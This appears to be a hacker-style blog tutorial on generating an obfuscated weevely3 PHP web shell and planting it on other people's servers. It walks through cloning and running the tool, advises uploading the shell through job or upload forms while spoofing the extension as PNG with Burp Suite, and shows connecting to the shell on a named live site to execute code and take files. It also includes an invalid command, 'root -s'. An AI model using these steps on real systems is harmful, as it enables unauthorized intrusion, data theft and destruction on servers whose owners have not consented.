How to Upload a Shell onto a Server

How to Upload a Shell onto a Server

Hello guys

Today you will learn How to Upload a Shell onto a Server

 

Essentially, this’ll allow you root privileges within a server.

 

 

For the sake of just making everything simpler, please provide yourself with permanent root privileges in the terminal via;

root -s

Generating the malware

 

• Download weevely3;

git clone https://github.com/epinna/weevely3

If you don’t have “git clone”;

apt-get install git

Should have generated a folder called, “weevely3” – should look like this:

 

Now that weevely3 is downloaded, we have to generate the payload

 

• But first, let’s grab the dependencies;

 

You may do so by typing in the following commands;

apt-get install g++ python-pip libyaml-dev python-dev
pip install prettytable Mako pyaml dateutils --upgrade
apt-get update

• Now, see if it works…

cd ~/(directory)/weevely3
python weevely.py

If it generates the following output, you’ve done good;

 

• Generating the payload;

python weevely.py generate [password] [path]

For example;

python weevely.py generate iLikePie ~/Desktop/shell.php

Something interesting it does is obfuscate the code; making it more stealthy

Uploading the malicious code

 

This is something you’ll have to figure out on your own since I don’t have anything to test it on, legally speaking (im actually just incredibly lazy). However, I would suggest looking for “job forms” or “upload forms”, in which you’d be able to upload the malicious code.

 

Also, I’d suggest using BurpSuit to spoof the extension confusing the server, making it think it’s a — let’s say — PNG file.

 

Connecting to the shell

 

Now that you’ve placed the shell within their system, it’s time to connect to it. Do it by;

python weevely.py [url] [password]

Example;

python weevely.py http://nulled.to/shell.php iLikePie

From here, you’d have root privileges of the server; you’d be able to execute code, delete/replace/download files, etc.

 

 

 

Leave a Reply